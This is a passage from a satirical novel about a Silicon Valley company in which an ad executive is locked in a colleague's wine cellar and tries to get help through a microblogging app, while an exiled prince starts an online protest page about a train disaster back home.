“Or the sign that we will fail like all the others,” Niels sighed. A moon colony was crazy even by Anahata standards.
“Our utopia will be different. We’ve spent several months analyzing the best combinations of political thought, philosophy, and technological advances necessary to achieve a better society. We’ve also looked at societal failures through the centuries — Rome, Byzantium, and so forth. What was consistent throughout was a lack of individual purpose. As a society progresses, it becomes more specialized, and while its citizens become ever more dependent on each other, they have no relationship with the tasks they perform. They are cogs in a wheel they never wanted to build.”
Niels remembered late-night pot-filled conversations in college that sounded a lot like this. He fiddled again with the wooden spindle digging into his back. When the first ad appeared on Moodify, he’d send Gregor a new chair as a snide gift. Nothing was more insulting to a rich man than to send him a better version of what he already owned.
“We will take the best sampling of society and give people roles that fit their skills,” Gregor continued. “The man born to be a mechanical engineer will be a mechanical engineer. He who cooks well will be a cook. There will be no anomie — I guess you don’t know the philosopher Émile Durkheim? But in any case, every man will have his place. Every man will work together, for himself and for the greater good of the group.”
Niels put one hand behind his back and began to twist at the base of the wooden spindle, trying to wrench it free from the chair. It wouldn’t budge no matter how hard he tried. He could feel the sweat forming amateurish circles under his expensive shirt.
“This goddamn chair — “
He looked up and saw Gregor studying him, expressionless.
“I mean,” Niels said, “how are you going to transport all of mankind to the moon?”
“Oh no,” Gregor said. “That would just be bringing along the bad seeds and all their earthly problems. There is a full selection process. The bulk of the group will be engineers, of course, as they perform very well across every factor we’ve determined necessary for success. You see, we have calculated a target percentage for every category of person and skill type that we need in order to have a high societal success rate.”
“Argh!” growled Niels, the spindle behaving even more egregiously than before, pushing on his spine, scratching at his well-buffed skin. Such a crappy chair had no place in his existence. He worked way too hard and earned too much money to have to sit in chairs like this.
He scooted to the edge of his chair, but the spindle followed him, digging into him, pushing him forward and downward as though he were Gregor’s supplicant. Unacceptable!
Niels leaped to his feet.
“Sit. Please,” said Gregor, leaning across and pulling the the spindle out of Niels’ chair in one single, swift movement.
“As you may have guessed,” said Gregor, laying the spindle next to the bottle of wine, “sales employees won’t be as likely to be admitted to the moon colony given the high bar, but that doesn’t mean they don’t have a shot. If you help us, I can even imagine we’d raise the percentage of acceptance for the sales employees. Provided, of course, that they pass the necessary tests.”
Niels snatched the spindle from the table and pointed it at Gregor. He thought the move looked intimidating, menacing even. But then he glanced down and realized he looked more like an orchestra conductor. He threw the spindle to the ground.
“You always get so upset when I speak in a factual manner about the sales team’s IQ,” Gregor continued. “But you should listen objectively to this plan, because there’s a part that you’re going to love.”
Gregor paused, then drew out his words. “I…will…let…you…monetize.”
Niels eyebrows shot upward in genuine surprise.
“Monetize the moon? You’ll let me do that?”
“Yes.”
“But…you never let me monetize,” said Niels, sitting down. “What’s the catch?”
“I’ll let you export the moon minerals,” Gregor said. “You and your team will go down there and pull them out and — ”
“Minerals!” roared Niels, rocketing out of his chair. “My team sells internet advertising, Gregor, not minerals! Internet advertising!”
“Well, before they can sell the minerals, they need to get them out of the ground, so the selling part is sort of a moot point at this stage.”
“You want my sales team to become miners?”
Gregor looked puzzled. “Oh, I hadn’t really thought they would be the miners. But now that you suggest it, it’s not a bad idea. The skill sets do overlap, I suppose. The ‘core competencies,’ as you call them, are the same — dirt digging, rubbing elbows with worms, hunting for gold — ”
“Gregor!”
“One thing,” said Gregor, holding up his hand. “I don’t want you to get too excited. We can’t export minerals right away. It really doesn’t become economical until we build the space elevator, and that’s not on the roadmap until late next year.”
“Space elevator?!? You are going to sink this company!”
Niels knew it was time. He jumped onto his chair and stomped his feet. He waved his arms in the air again, willing his face redder and redder, sputtering a few expletives to express his outrage at Gregor’s ridiculous plan. While not all business meetings required such theatrics, almost one hundred percent of Niels’ negotiations involved either throwing a pen or stomping away from the table. He found it was often the best way to force a rapprochement from his opponent.
“Sit down,” said Gregor, pouring them both more wine. “You have nothing to be concerned about. Project Y is highly economical. By retaining our best engineers and protecting our most secret projects, we save hundreds of millions of dollars each year. And that’s before even calculating the potential upside from building the world’s first functioning utopia. Ultimately, we think this could generate tens of billions of dollars of new revenue.”
Niels slowly lowered his arms, but he wasn’t sure what to do with them. Feigned outrage was a tried-and-true technique — why hadn’t it worked this time? Just the previous week, Niels had used the same approach on the CEO of the world’s largest advertising firm, and in a matter of minutes the guy agreed to make his own car a surface for real-time Anahata ads.
He decided to continue standing on the chair. Niels threw his hands on his hips and puffed out his chest, then clenched his fists to make his biceps pop.
“So you’re going to put a whole bunch of male engineers alone on a planet, huh? Sounds to me like this will last up until you have your first system downtime and your engineers are no longer able to stream porn from Earth.”
Gregor said nothing for a few seconds, as if it took him a moment to understand.
“Oh,” he finally said. “No, we’ve thought of that already. There will be women.”
“I mean real women, not robots and avatar women. Or holograms,” said Niels, referring to the recent Anahata prom, for which Bobby had commissioned Japanese nurse holograms to accompany dateless engineers.
Gregor waved him away, but Niels wasn’t sure whether he was ignoring him or missing Niels’ swipe entirely.
“Our engineers have found ways to solve all of the many dangers that could befall a young society — famine, natural disaster, war. You think they can’t solve the simple problem of women? History has shown that if you give an engineer a problem, he usually can solve it. Again, that’s why our society will primarily be made up of engineers.”
“Most of your engineers can barely dress themselves,” sniffed Niels, staring down at Gregor from atop the chair. “Besides, I heard what happened last year at your winter retreat — hardly the outcome one would expect from superior beings.”
“I don’t know what you mean,” said Gregor, but the hint of a grimace suggested otherwise.
As part of a team-building exercise, Anahata had put its engineers into teams for a virtual trek through the Amazon. Along the way, the engineers were met with various obstacles — wild animals, tree loggers, and angry environmentalists.
“You know exactly what I’m talking about,” Niels said. “Your engineering teams abandoned sick and injured teammates just so that they could make it out of the Amazon first. A bunch of the employees got fed to anacondas.”
“We didn’t use real snakes,” Gregor protested.
“They left their teammates to die.”
“Only in a virtual world!” Gregor’s face burst in splotches of red.
“Your moon colony is a virtual world!”
A few seconds passed, then Gregor spoke.
“I agree it would have been good of our engineers to save their colleagues. But at least their motivation was pure — to escape the jungle on behalf of Anahata. This is why they are the ultimate citizens of our new society. They will always work for its greater benefit and not be led astray by the petty distractions that affect so many other people. Distractions like…”
Gregor’s eyes flashed.
“Distractions like pots of gold.”
It was clearly a dig. But last year’s sales incentive — in which Niels had promised a pot of authentic gold doubloons to any sales team member who doubled their returns in a quarter — had proved to be a brilliant motivational technique. Anahata had tripled its profits that year thanks to a bit of luck o’ the Irish. Niels wasn’t crazy; he was shrewd. And that, he believed, was the difference between him and the man seated below him. There was no reasoning with insanity.
“What do you want from me,” Niels asked, throwing his hands up. He was no longer certain of his next move. Should he come down from the chair? Or maybe it was best to speak to Bobby directly, though that also carried risks.
“Stop blocking my teams from testing on Shanley Field,” Gregor said. “Free up the servers in Eastern Africa. Basically, get out of our way. In exchange, I will give you full transparency into our plans and eventual access to the moon minerals.”
“No, I don’t like this,” Niels said. “It’s not right for Anahata. And what will the rest of the world think when they find out? Our shareholders will freak out and the stock price will tank.”
“It doesn’t matter. By the time they find out, we’ll be gone. On the moon. And once we’re there and things are up and running, it will be easy to prove that the model works.”
Niels sighed and shook his head. He was used to arguing over dollars in well-lit restaurants, not debating with a psychopath in his wine dungeon. It was time to play the Bobby card.
“I think we need to talk about this — seriously talk about this at a very, very long management meeting.”
Gregor’s face tightened. “There is nothing to talk about. Bobby agreed to this a long time ago.”
“Then Bobby’s going to need to come talk to me if he wants those servers in Africa. I’m not going to let you thwart the part of the company that makes all the money and funds your crazy ideas.”
Niels got down from the chair and took a step toward the stairs.
“Wait! We’re not done!” Gregor yelped.
Niels suppressed a grin. Clearly, all was not lost. He counted to five in his head, and slowly, slowly turned toward his prey.
“Maybe there is a way…”
“I’m sure we can find a compromise,” said Gregor, the slight tremble in his voice confirming Niels’ hunch.
Gregor was afraid Niels would turn Bobby against him. It never ceased to amaze him the things grown men feared. Niels feared no one.
“I want ads on Moodify,” Niels said.
Gregor’s face scrunched into a sour ball, then unfolded into a scowl before disappearing underneath his skin. A second later, it was as if his face had never hosted any expression at all.
“Listen,” said Niels, “you let me put ads on Moodify and I’ll support you one hundred percent in the moon colony project. Shanley Field, servers in Africa — I’ll even give you a few sales guys who can wash your engineers’ laundry on the moon.”
Niels held out his hand, but Gregor made no move toward him. For a minute, the two men stared at each other without moving.
“Putting ads on Moodify bracelets is bad for our users,” Gregor said.
Niels shrugged. “Okay, I’ll just discuss this with Bobby tomorrow and — ”
“Wait,” said Gregor, jumping out of his seat and moving quickly toward Niels. “There is something I have to show you.”
Gregor took a few slow steps backwards toward the stairs, as if his gaze could freeze Niels in place. He then turned and bounded up the steps, letting the door slide gently behind him.
Down below, Niels crossed his arms and yawned loudly.
But once Gregor was gone, Niels began to rub his temples. Why hadn’t he just gone into banking instead? Greedy capitalists were so much easier to negotiate with than engineers.
Five miles away, Arsyen Aimo was also thinking about money — namely, that thanks to his huge new salary, he was once again on the winning side of capitalism and ready to upgrade his entire life.
Part of that upgrade definitely involved getting a new girlfriend — preferably an American one with excellent teeth.
Of course, he already had a girlfriend, Natia, though that had happened somewhat by accident.
A year earlier, he had signed up to an online dating site as “Rick,” a blond surfer from Santa Cruz. Rick resembled an underwear model, with a chiseled body, defined jawline, and a strong nose echoing Arsyen’s own good looks.
The first woman he met was Natia — herself masking as a Romanian grad student at Berkeley. Between her confusion of Los Angeles as a Northern Californian city and Arsyen’s own English mistakes, they quickly called each other’s bluff and soon were speaking to each other in Pyrrhian.
They struck up a fast virtual friendship — not more than that initially, as they were both too practical to imagine dating someone thousands of miles away. Arsyen took pains to conceal his true identity. From his experience, once a Pyrrhian woman knew she was in the presence of an Aimo, all hopes of reasonable conversation dissolved in a puddle of sighs. Instead, he told her about living in America, about drive-through pharmacies and the endless array of flavored sparkling water, and the importance of sanitation engineers like Arsyen, who fixed the various clogs, stains, and crumbs that could slow the infrastructure of a fast-moving startup.
She in turn wrote to him about her life in Poodlekek, Pyrrhia’s capital. Natia worked as a switchboard operator for the national telecommunications firm, a graying dinosaur that was slowly moving Pyrrhia into the 1980s. She belonged to a political philosophy group, which met weekly to discuss why Marxism failed and whether man could subvert machine in a post-capitalist society. Arsyen found her little intellectual forays rather cute. There would be no need for political philosophy once royal reign was restored, but why discourage Natia from stretching her feminine brain in the meantime?
She was particularly passionate in her dislike of General (now President) Korpeko — the source of the Aimo family’s undoing. He was a “despot,” she wrote, “hell-bent on pushing sports and false achievements instead of encouraging the true prosperity of the nation.”
Among her many gripes was Korpeko’s obsession with the little-known sport of curling. He believed it was Pyrrhia’s ticket to international fame — sufficiently obscure as to ensure little competition from wealthier countries. Korpeko had replaced all the bike lanes and gutters along main roads with curling courts, and no vacations or trips outside the country were allowed during the first week of February, now known as Pyrrhian Curling Week. Arsyen’s stomach tightened each time he imagined Korpeko’s curling lanes snaking across Pyrrhia’s unmarred hills.
“It sounds nothing like the rich cultural life that once flourished under the royal family,” Arsyen wrote to Natia, thinking of the literary salons and long afternoon croquet matches his family hosted at their summer palace for the Pyrrhian elite. The king had generously ensured that vivid accounts of the affairs were published in all of the country’s newspapers so literate citizens could vicariously enjoy the experience.
“Do you remember the photos of them playing croquet atop their verdant courts?” Arsyen asked. “It was far more dignified.”
“Yes, I suppose if you consider hitting a ball a more civilized activity than rolling a puck,” Natia replied.
Natia’s lack of appreciation for croquet was one of the many shortcomings Arsyen had been forced to tolerate as a lowly janitor. Another was the mole on her cheek — it was just a little too big for his liking; he often found himself covering it up with his thumb whenever they did video chat.
Luckily, product managers didn’t have to put up with such defects. When product managers discovered problems, they fixed them. And that’s exactly what Arsyen planned to do.
With a fat new paycheck now coming his way, Arsyen was better equipped to find himself a beautiful American girl — someone like that hippie receptionist, Jennie. Then, when the time was right, he would return to Pyrrhia bronzed and wealthy, with his beautiful queen and her good orthodontics on display. Natia and the other women of Pyrrhia would weep at what they had lost, only able to take comfort in the possibility of becoming one of Arsyen’s bathing maidens.
So it was decided: Natia was out. The only question was whether to write her a breakup email now or first play his video game.
Arsyen opted for the video game. And there he was, a half-hour later, stuck on his couch, glued to his screen, when the phone rang.
It was the chief strategist with the Throne Reclamation Committee (the TRC).
“Have you heard the news? A train went off Golden Bridge and fell into the lake.”
“Mmmhmm,” said Arsyen, drawing his sword and piercing the heart of a castle guard. “It was probably a drunk conductor. Our trains are flawless.”
The national rail service had been one of the great Aimo accomplishments — christened by his father as “locomotives of progress and prosperity.” The king even had a toy train replica built to travel over their palace moat and directly into Arsyen’s bedroom. He wondered if that train was still there — particularly the first-class carriage, outfitted with miniature foodstuffs. As a teenager, Arsyen often threw the train’s gold-plated bison fries at his manservant Sklartar when the old man wasn’t moving fast enough.
“They say you could hear the screams of the children as the train flew through the air,” the strategist said, “that the flames moved across the sky like a rocket.”
“Huh,” said Arsyen, his thumb pumping up and down on the console button as he sliced through the head of one of the king’s henchmen. Tragedies often befell poor nations. There wasn’t much point in getting worked up over a handful of dead bodies.
The felled henchman rose, holding his head in his hands. He was coming back for more. As Arsyen pumped the console with his thumbs, the phone fell from his ear. No matter, if the news was that important, he was sure to hear from the TRC again. Nothing was going to interrupt his game. He had made it through his grueling first week at Anahata and deserved some downtime.
Arsyen glanced at his email on his way to the bathroom a few minutes later and saw that Natia had written. She too was obsessed with the train accident. She claimed the government had stopped any media from reporting the event, fearful that the news could put a damper on its bid to host the International Curling Championships the following year. Government workers had already begun repairing the bridge, and no effort was being made to dredge up the train. Meanwhile, the police were arresting anyone they believed was spreading rumors. All internet services were blocked in the capital, and Natia had been forced to travel outside the province to get to any café with open access. “If they find out I am here, they will arrest me, or worse!” She wrote. “Help us get the word out about what happened. Hundreds are dead!”
Arsyen had assumed the TRC had been talking about ten people. Hundreds of people elevated the train wreck to a national disaster — the kind of thing worthy of a future king’s attention.
“What would a king do…?” Arsyen wondered aloud, imagining himself laying his healing hands upon thousands of maimed Pyrrhians, their bodies draped in rags — rags he would eventually replace with velvet robes! — as they lay prostrate before him. They shielded their eyes from his divine light, and chanted his name to the ground below them. King Arsyen. King Arsyen.
He shook himself back to reality. His dream was still far off. Whatever happened in Pyrrhia now would certainly be repeated in a year’s time, with a new set of mothers rolled out to despair over the loss of their children at the hands of Korpeko’s corrupt and negligent government. He needed to be patient and let these minor catastrophes accumulate. At the point of ten train wrecks, the time might finally be right for a royal coup.
But in the meantime, Arsyen could at least give a nudge toward revolution and have some quick fun with Korpeko. If working in technology had taught him anything, it’s that the internet loves a troll.
While working at Galt, Arsyen had learned about GaltPages — a popular tool that aggregated everything people had to say on all the different Galt apps. He even half-started his own GaltPage a few months earlier to promote his Aimo Air Freshener — a custom pink mixture he invented out of cleaning supplies so he could cover up the persistent stench of body odor that permeated the Galt meeting rooms. Its cotton candy scent would one day make Arsyen millions — provided he could figure out how to keep it from combusting.
He hadn’t gotten very far with his page back then, but Galt seemed to have made its product easier to use since he last tried. He could easily repurpose his early work to suit Natia’s social justice needs — the fluffy pink plume of cotton candy in the page’s background no longer suggesting a sweet scent but rather an artsy take on a nuclear holocaust. And, Arsyen told himself, there was a potential bonus to be had in all of this: If enough people were interested in what he posted about Poodlekek, he could collect their contact info and sell them his air freshener once all the furor died down.
Arsyen had worked in the Valley long enough to know that the key to social media was virality, not sincerity. So he renamed the page “Justice for Poodlekek” and posted Natia’s text about the accident, calling for action. He then posted the link to Justice for Poodlekek in the comment section of every Pyrrhian blog and newspaper article he could find and wrote a review of Korpeko’s government on the restaurant review site Help! Then he added pictures of Golden Bridge to his Photomatic account, using the retro and futuristic filters, as well as a bleaker one with a sprinkling of decapitated bodies.
Arsyen leaned back in his chair and put his hands behind his head. It was an awfully nice thing he had just done for Natia, and it would hopefully assuage her disappointment when he broke up with her in favor of dating Jennie.
He returned to his video game and quickly forgot about the page. But a while later, passing by his computer on the way to the kitchen, he saw that the previously blank comment section of Justice for Poodlekek now hosted a long list of responses. The view count was already in the thousands and climbing with each minute. Arsyen did a double take: People seemed to really be upset by this train thing. And not just the train, but about Korpeko and his government as well.
The street light has been out for two weeks. Why is there no bison milk on Mondays?
Arsyen squealed with delight. His people seemed so unhappy! He hit the refresh button again and again, each new complaint augmenting his euphoria.
Korpeko will drag our country into further poverty! I hate curling!
Arsyen couldn’t resist posting a comment under a fake name.
This never would have happened when the Aimos were in power!
Someone replied immediately.
That’s true. King Aimo would’ve made us play croquet until our fingers fell off.
Arsyen laughed. That had indeed happened to a few unlucky peasants who had trespassed on the royal croquet court.
As the minutes passed, complaints about bison milk were replaced by complaints about potholes, potholes by accusations of corruption, corruption by torture.
Arsyen did a small jig before his computer, then paused — first to check out his flexed biceps reflected on his computer screen, and then to update his page with a new message.
My people, we must take action!!
Of course, Arsyen knew President Korpeko would put it all down. That’s how it happened in Pyrrhia and the rest of the poor world. People protested and waved hand-painted signs, and then, if they weren’t disappeared by the government, they trudged back to work on Monday.
But Arsyen’s well-meaning but rather stupid Pyrrhian subjects couldn’t see that far ahead. Instead, the misery of Pyrrhia wrote itself across the Justice for Poodlekek page. The decay of the streets, the decay of the nation, the decay of everything, really, but the country’s gleaming curling lanes. The page’s followers swelled into the thousands within minutes. Soon they were asking about the creator of Justice for Poodlekek, calling on him to lead them forward.
It was terrible timing. He still had six levels to go in his video game.
“Men of action take action,” Arsyen said to himself, repeating a poster he had seen outside one of Anahata’s sales buildings.
He composed a short note to Natia:
My dear Natia, I have made a GaltPage to help you spread the word. Also, I am sorry but I think we will have to break up because I am not going to be able to come to Pyrrhia anytime soon.
Arsyen paused. What if Natia showed up one day in California without that unfortunate mole and wanted to sleep with him?
He began to type again.
Let me know if you ever come to California. Keep in touch!
Then he left the house to go grab a burrito. He needed some fuel to keep him going if he was going to conquer the six-headed henchman later that night.
Whatever Gregor Guntlag was trying to prove, Niels was determined to ignore it. He would meet Gregor’s final, desperate plea for cooperation with the same dismissal with which Gregor had treated Niels’ chair-jumping antics.
Niels pictured Gregor lugging the mysterious proof of his superior world order down the stairs, his combat boots thudding against the wooden steps, then stomping to the table. What did he want to show Niels? A philosophy book? A line of code? A diorama? Regardless, Niels’ expression would remain placid, unmoved, mouth silent in Guntlagian style until Gregor’s desperation grew to the point where Niels would only need to repeat three words: “Ads on Moodify.” Maybe he would even agree to let Niels put ads on employee T-shirts and the meeting-room chairs.
When had Gregor left exactly? Half an hour earlier? An hour? It was starting to seem like an awfully long time to leave someone waiting in a basement.
It was obvious what Gregor was trying to do. He had locked Niels in the cellar in order to assert his dominance and put Niels on edge. But these kinds of mind tricks and one-upmanship were old hat for a Master Negotiator. After all, Niels was the man who had challenged a quadriplegic music executive to a game of rugby; the man who hid E. coli in an opponent’s entree so he could pitch him on a business proposition as the other lay prostrate before the toilet for six hours. This wine cellar act was amateurish.
That said, why would a grown man lock a work colleague in his basement? Was that something Germans found funny? Or maybe Gregor was in fact Austrian. The Austrians were famous for their appreciation of basements. For a split second, Niels’ body tensed as he imagined Gregor descending the stairs in a pair of leather pants.
Niels closed his eyes, took a deep breath, and opened them again. He couldn’t help but respect his opponent for planting these seeds of doubt. Five minutes passed, then ten. Niels felt splinters from the chair making inroads into the back of his arms. Shapes emerged from the shadows, then receded. Another twenty minutes passed.
Niels knew he shouldn’t panic, but the shadows, the quiet, the unpredictability of his opponent all began to cloud his confidence. The longer he sat and paced and sat and paced, the more Niels became convinced that the taciturn Teuton was planning to leave him there all night, returning only once confident that he had broken the Master Negotiator.
Niels needed to plot his escape. From his shirt pocket, he pulled out the pen and pad of paper that he always carried with him. In a world of internet intangibles, Niels found reassurance in last-century items.
His high-level plan of attack was fairly easy to map. First, Niels needed to get himself out of the basement, and second, he needed to stop Gregor’s moon colony plan. (Third, he needed to destroy Gregor, though that was a longer-term goal that would require a separate strategy and PowerPoint deck.)
The question, of course, was how to go about these things. Niels considered the obvious — he could call another member of the management team. But as soon as Fischer, HR Paul, or Old Al showed up, Gregor would have some story ready and they would all have a good chuckle over Niels’ paranoia. Word would get out around Anahata, and even his own team would eventually find out about his panicked call for help. Exhilarated by the scent of weakness, the salesmen would circle him like the killer sharks he had trained them to be. It would be the end of him.
Instead, Niels sketched a mountain. At the base, he wrote, “Me.” At the summit, he wrote “FREEDOM.” Then he paused, realizing that he had failed to capture the full complexity of the situation. So he drew a second mountain next to the first. Now he had a mountain range. At the base of that second mountain, Niels wrote, “Gregor announces Moon Colony Plan.” At the top, he wrote, “I DESTROY the Moon Colony Plan!!!”
After a few minutes, and a few trees and shrubs added to his drawing for good measure, Niels had the entire route mapped, from base camp to summit. He was ready to go. He leaped out of his chair and did fifty jumping jacks, followed by one hundred situps, enjoying the rush of blood through his body. Niels would save Anahata from the worst decision it could ever make, and possibly even get Gregor fired in the process.
The first step was simple. He would ring Bobby and suggest that he pick Niels up at Gregor’s house for a midnight yoga class. Bobby was a sucker for yoga invites and had stated on numerous occasions that he wished the management team would chant together. Niels, for his part, thought yoga was the lazy man’s excuse for exercise, but like golf and wine, he saw value in its acquisition. Yoga had not only helped him meet several lonely housewives, but had also distinguished him as the only member of Bobby’s team who could execute Chaturanga Dandasana — providing a reasonable excuse for him to seed business ideas over sun salutations.
Niels pulled out his phone, selected Bobby’s number, and was soon hit by his mountain’s first boulder. There was no reception in Gregor’s basement.
He was not used to being knocked down so early in the game, but like a true sales champion, Niels rose quickly. “Only losers lose,” he whispered to himself, quoting one of the motivational posters in his office. He did five pushups with one hand, then jumped to his feet.
Niels tapped his phone’s email application and began to type:
Bobby, have just heard of a killer nighttime yoga studio in Mill Valley. Fantastic kombucha bar. I can get us in. Can you meet tonight? I’m at Gregor’s — stuck in his basement actually, funny story. Come grab me and we can head straight to the studio.
He paused. Would Bobby sense desperation? He needed to make his message appear as normal and Niels-like as possible.
Also, Gregor told me all about Project Y. Fascinating idea. I have some ideas about how we can monetize.
Niels smiled. He could feel his bed and a good night’s sleep within reach.
He pushed “send” and immediately began composing a second email, this time to HR Paul. Gregor’s insanity needed to be recorded somewhere — even if in the short-term Niels had no intention of compromising Anahata’s public reputation and Niels’ own financial stake in the company — by outing its head engineer as a psychopath.
Niels decided to attach a photo of himself in the basement. He raised his phone camera to get an angle that captured both the rows of wine bottles and the staircase leading up to a locked door. Then he hit “send” and took a swig of the Chateau Margaux — it would make for great bragging rights at next month’s HBS Successful Man Golf Tournament.
Niels opened the email application again, and his face fell. His email to Bobby hadn’t gone through. In its place was a time-out message — the data connection just wasn’t strong enough. Niels tried to send again, and then again and again, from different parts of the basement. But each time he was met with the same result.
The Master Negotiator was hit with a strong dose of reality — there was no phone connection, only a very weak data connection, and he was trapped in an Austrian psychopath’s basement.
Niels scanned the room. Aside from the bottles of wine, it was absolutely empty. The staircase led to the locked door on the first floor, but otherwise there were no windows and no way out. He couldn’t go to work. He couldn’t make money.
He couldn’t make money!
“No!!!” he screamed, kicking over one of the chairs. He bounded up the stairs and began pounding on the door. “Let me out! You can’t do this!”
Niels pounded for several minutes, but there was no answer from the other side.
Niels crumbled on the top step and was at first shocked, then horrified, then just miserable to discover that the wet feeling on his face were tears, actual man tears. His body shook, and he began to feel cold. He wanted his mother, or the ex-girlfriend he had cheated on, or even just that hippie receptionist he had slept with.
Or even God. Niels clasped his hands in prayer, unsure whether the gesture was necessary for the Almighty to hear him. Did God have to listen to him? Didn’t God love rich people?
Just in case, Niels apologized extra hard for ignoring Him the previous four decades and promised that he would be good from now on. He wouldn’t sleep with receptionists, he’d mentor inner-city entrepreneurs, and he’d teach the homeless how to code. He’d get rid of moon colonies and pop-up internet ads, and he’d fix piracy on the web once and for all. Above all, he’d be a good citizen and son and follower of whatever religion God turned out to belong to.
He looked down at the useless mobile phone in his hand. Tears had formed pathetic puddles across its surface, distorting his Flitter application, which now seemed to sprout wings from the “f” of its logo. Niels stared at it for a few seconds, watching the “f” heave under his tears, like a bird dreaming of flight.
And then it hit him. Flitter — Galt’s popular thought-sharing tool — was famous for working in the lowest-bandwidth parts of the world. They were always bragging in the press about how someone had used their tool to escape an oppressive regime. It drove Bobby crazy — he thought Anahata should have a monopoly on freedom and hope.
Niels didn’t care about any of that. In fact, he had zero interest in Galt or Flitter or in reading anyone’s thoughts other than his own. But a year earlier, he had tried to convince Galt to run Anahata’s ads on their apps and opened a Flitter account, Niels_1973, to show them he really cared about their product. But eventually the deal fell through, and other than a few half-hearted fleets about some Anahata sports matches, Niels’ account lay dormant for months. He had practically forgotten he even had it installed on his phone.
The likelihood Flitter would work in the cellar was low, but Niels had nothing to lose. He fired up Niels_1973 and, hands shaking, expressed his panic in fewer than one hundred thirty-five characters (the limit set on any Flitter message):
Help me! Trapped in basement at 13 Willow St, Atherton.
Niels hit “send,” and in a split second, the post was successfully transmitted. Niels jumped up from the step, pumping his fist in the air. “Yes!” he cheered. He sat back and waited.
And waited.
And waited.
Twenty minutes passed, and there was no response — no “we’re coming,” or “hold tight, buddy!” For a moment, Niels wondered whether his message had indeed been delivered — or fleeted, as the Flitterati would say. But he could see there were millions of other live fleets coming in from the rest of the world — fleets about politicians, fleets about celebrities, fleets from companies hawking their products, and fleets from celebrities hawking those same products. Clearly someone was getting through to someone.
The problem, Niels quickly realized, was that no one was listening to him. He had only two people following his fleets: agefshgr_74 and tina_xxx. Niels didn’t even know who they were or how they had found him in the first place.
“Failure is not an option,” Niels whispered to himself, repeating the Smeardon family motto. He took a gulp of Chateau Margaux and reminded himself that the important thing was that Flitter worked. The next step was simply to make it work better for him. He needed something more eye-catching — something that would get people so excited that they would want to refleet his message to all of their friends and followers.
He quickly settled on Tech Geek, the Valley’s hottest tech gossip site. Including the @techgeek Flitter handle was his best bet to be seen by someone following their account. So Niels tried again, decades of Chateau Margaux life force moving him into a new world of confidence:
@techgeek Love your hard-hitting tech analysis. Also: Help me! I’m a prisoner of #Anahata.
Up in San Francisco, Tech Geek’s social media manager stared at the fleet from Niels_1973 and groaned. Of all the Galt apps, Flitter definitely had the most crazies. There was something about giving people just one hundred thirty-five characters to express themselves that made them even more desperate — fueled by the hope that a bite-sized thought would be small enough to penetrate the world’s scattered attention.
It wasn’t just weirdos like Niels who drove him crazy. It was the number of people who didn’t properly understand Flittiquette. They exhibited a poor use of hashtags, a tendency to refleet every compliment or inane statement made by a follower, and an inability to craft something eye-popping in one hundred thirty-five characters.
Social media was a twenty-first-century art, and a true amateur (“in the French sense,” he explained to anyone who would listen, “meaning a lover of social media”) had to spend time honing his craft. He often reflected that his title should have been Master Craftsman of Social Media. Or simply God.
Because as far as he could tell, there was no job with more prestige. Sure, he told his friends, he could take a high-paying social media job at a big corporation, but that wasn’t his style. He didn’t want to be the guy fleeting “Not feeling fresh? Try the new #Summer_douche in fresh lavender.” He had done his college senior thesis on Che Guevara’s influence on scatological pop art. He could hardly sell out to the agro-chemico-industrial complex to be their social media plaything. He was part of an #online #revolution #disrupting #everything.
That’s why he was at Tech Geek, by all accounts the heart of the universe — or, at least, his universe, and the universe of anyone who mattered to him. Tech Geek was where all things tech and Valley were beating, throbbing, iterating, de-duping, compiling, normalizing, and randomizing. As far as he saw it, if you did social media for the Valley, you were, in many ways, the Valley. In fact, he liked to think of himself as a modern-day William Randolph Hearst. The decisions he made — whether to refleet someone’s comment, post a piece of news or gossip about another company, or (shock!) ignore it altogether — these were the things that made and broke powerful men and their companies.
So it annoyed him when fools like Niels_1973 would fleet things that were clearly false, just in the hope of grabbing his attention. It was irresponsible and a waste of his time. Niels_1973 was probably the same guy who had tried to send a “tip” to Tech Geek a few months earlier that Anahata had discovered Atlantis and was refurbishing it so that Bobby Bonilo could have an underwater pleasure kingdom. Or the guy who had fleeted that Anahata was suggesting its lowest-performing employees take performance-enhancing drugs. Granted, the latter proved to be true, but the source had missed a crucial detail. Anahata was randomizing who would get the drugs so they could analyze the effectiveness of the trial — a piece of research that would be helpful for the entire scientific community. #Detailsmatter
Niels_1973: @techgeek Love your hard-hitting tech analysis. Also: Help me! I’m a prisoner of #Anahata.
He reread the fleet and shook his head. He spent several minutes contemplating the various punishments he could mete out, finally deciding to block Niels_1973 from his list altogether. It was an extreme punishment, but he couldn’t condone such outrageous, attention-seeking behavior.
Then, feeling like he had done yet another great service for the world, Tech Geek’s social media manager called it a night and made his way to bed.
It took total isolation from the outside world for Niels to discover what millions of Galt fans around the world already knew: There was no longer any point in real conversation when you could just communicate in short phrases and poop emojis.
As night gave way to morning, Niels found himself deeply focused on a handful of celebrities and their preferred hair products and was closely following the reports of a burgeoning relationship between two contestants on a popular reality TV show. His concern for smooth hair and the couple’s happiness grew stronger as he finished off the bottle of Chateau Margaux, then opened a 1787 bottle of Chateau Lafite.
Niels’ innumerable fleets about captivity, despair, and Anahata had gone unanswered despite variations in text, creative spelling, and attempts at haiku. Despite hours of nonstop fleeting, there were still no refleets by his two followers, and still no acknowledgment from Tech Geek. Nor had he gained any new followers who could potentially spread the word on his behalf.
Ever the mountaineer, Niels devised a new plan, with a new mountain range that showcased the complexity (but also the conquerability!) of his current situation. This was one of his favorite mountain-range models to use at work. It had switchbacks and a very large boulder. The point, he often told his team, was to not get distracted by the boulder and to stay focused on the switchbacks.
Flitter users were switchbacks.
No, they were boulders.
Well, whatever they were, they weren’t the point. The point was, he had been foolish to think that people on Flitter would care about him, Niels Smeardon. What they cared about was the content he himself had been sucked into — the celebrities, the gossip, the lifestyle guru tips. The trick was to make these idiots care about him through his connection to the people they worshipped. They were like lichen growing on top of the boulder. Or maybe the sign at the bottom of the mountain marking the trail. Or…
“I don’t need mountains,” Niels growled. “Mountains need ME.”
He crumpled the paper and tossed it to the ground, then immediately started fleeting again.
His first pass was a flop, despite referencing the biggest pop star on the planet — the sexy blonde singer named La Lala who was known for hitting high notes while writhing on the floor with pythons.
#OMG LaLala making new video with #Liberace! A duet with a legend!
The only reaction came from Tina_xxx, who removed herself from his list of two followers. No one else responded to his fleet.
Niels sipped some wine and took a few minutes to study the most popular tweets about La Lala. Then he tried again.
#LaLala sings at #Nashville high school, discourages #bullies. Wears pythons in school uniform. Such an #inspiration!
Niels doubted La Lala had ever been to Nashville. But no matter, within minutes, he had been refleeted. There was even a string of responses, most of them from Lala fans in Nashville asking where she had sung. Niels responded:
